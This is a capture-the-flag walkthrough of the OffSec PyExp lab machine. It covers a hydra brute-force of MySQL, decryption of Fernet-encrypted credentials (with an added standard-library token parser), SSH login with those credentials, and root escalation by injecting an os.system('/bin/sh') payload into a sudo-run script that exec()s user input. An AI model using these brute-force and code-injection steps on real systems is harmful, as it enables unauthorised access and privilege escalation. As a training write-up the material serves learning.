PyExp Walkthrough (OffSec)
Santosh Kumar
Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researcher || TryHackMe Top 1% || Programming C, Python || Bug Bounty ||
Room link https://portal.offsec.com/labs/play
Enumeration
I ran a RustScan scan and discovered the open ports.
Port 80 is not open, so the attack surface is drastically reduced.
A MySQL service is running on port 3306, so let's enumerate MySQL.
MYSQL BRUTE FORCE USING HYDRA.
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.160.118
If using 'root' as the username was unsuccessful, our next step would be to attempt using 'admin' instead.
I got the password for the MySQL user root, which is prettywomen. [root:prettywomen]
MYSQL ENUMERATION:
Then log in to MySQL:
mysql -h 192.168.160.118 -u root -p
show databases;
use data;
show tables;
select * from fernet;
The data seemed to be base64 encoded, but when I tried to decode it, it yielded nothing. However, since I know that Fernet is a symmetric encryption mechanism, I used the key and ciphertext with an online decryptor and found a set of credentials.
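A Fernet token base64-decodes to binary, not text: a version byte 0x80, an 8-byte timestamp, a 16-byte IV, AES-128-CBC ciphertext and a 32-byte HMAC-SHA256 tag, with the 32-byte key split into a signing half and an encryption half. The following script is an added example, not part of the original walkthrough: it parses a token and checks its tag with the standard library alone, so key and ciphertext never have to be pasted into an online decryptor; the key and token it uses are constructed, and decrypt_token() is an assumed helper that needs the third-party cryptography package.

```python
"""Parse and integrity-check a Fernet token with the standard library only.
Layout: 0x80 | 8-byte big-endian timestamp | 16-byte IV | AES-128-CBC ciphertext | 32-byte HMAC-SHA256.
The 32-byte key is two halves: bytes 0-15 sign (HMAC), bytes 16-31 encrypt (AES)."""
import base64
import hashlib
import hmac
import struct

VERSION = 0x80
MIN_LEN = 1 + 8 + 16 + 32  # version + timestamp + IV + tag; ciphertext may be empty

def split_key(fernet_key: str):
    """Return (signing_key, encryption_key) from a base64url Fernet key."""
    raw = base64.urlsafe_b64decode(fernet_key)
    if len(raw) != 32:
        raise ValueError("Fernet key must decode to exactly 32 bytes")
    return raw[:16], raw[16:]

def parse_token(token: str) -> dict:
    """Split a token into its fields; raises ValueError if it is not Fernet-shaped."""
    data = base64.urlsafe_b64decode(token)
    if len(data) < MIN_LEN or data[0] != VERSION:
        raise ValueError("not a Fernet token (bad length or version byte)")
    (timestamp,) = struct.unpack(">Q", data[1:9])
    return {"timestamp": timestamp, "iv": data[9:25], "ciphertext": data[25:-32],
            "tag": data[-32:], "signed": data[:-32]}

def verify_token(token: str, fernet_key: str) -> bool:
    """True if the HMAC over version|timestamp|IV|ciphertext matches under this key."""
    signing_key, _ = split_key(fernet_key)
    fields = parse_token(token)
    expected = hmac.new(signing_key, fields["signed"], hashlib.sha256).digest()
    return hmac.compare_digest(expected, fields["tag"])

def build_token(fernet_key: str, iv: bytes, ciphertext: bytes, timestamp: int) -> str:
    """Assemble a token with a valid tag (used here only to construct a sample)."""
    signing_key, _ = split_key(fernet_key)
    body = bytes([VERSION]) + struct.pack(">Q", timestamp) + iv + ciphertext
    tag = hmac.new(signing_key, body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + tag).decode()

def decrypt_token(token: str, fernet_key: str) -> str:
    """Offline decryption; needs the third-party 'cryptography' package (assumed installed)."""
    from cryptography.fernet import Fernet
    return Fernet(fernet_key.encode()).decrypt(token.encode()).decode()

# Constructed sample: fixed key and IV, placeholder ciphertext bytes (not real AES output)
SAMPLE_KEY = base64.urlsafe_b64encode(b"\x01" * 32).decode()
SAMPLE_TOKEN = build_token(SAMPLE_KEY, b"\x02" * 16, b"\x03" * 32, 1700000000)
print("Fernet-shaped:", SAMPLE_TOKEN.startswith("gAAAAA"), "tag ok:", verify_token(SAMPLE_TOKEN, SAMPLE_KEY))
```

A tag mismatch means either the wrong key half or a token altered in transit, so check it before spending time on decryption.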
I used the new credentials to access the SSH server.
username: lucy, password: wJ9`"Lemdv9[FEw-
ssh lucy@192.168.160.118 -p 1337
I got the flag in user.txt.
PRIVILEGE ESCALATION
I tried many different techniques and was disappointed.
cat /opt/exp.py
uinput = raw_input('how are you?')  # Python 2: raw_input() returns whatever the user types, as a string
exec(uinput)  # that string is then executed as Python code, with the privileges of the interpreter
So the plan is to run exp.py with sudo under Python 2 and, at the prompt, supply import os; os.system("/bin/sh"), which exp.py's exec() then runs, giving a shell.
import pty;pty.spawn('/bin/bash')
Thanks for visiting: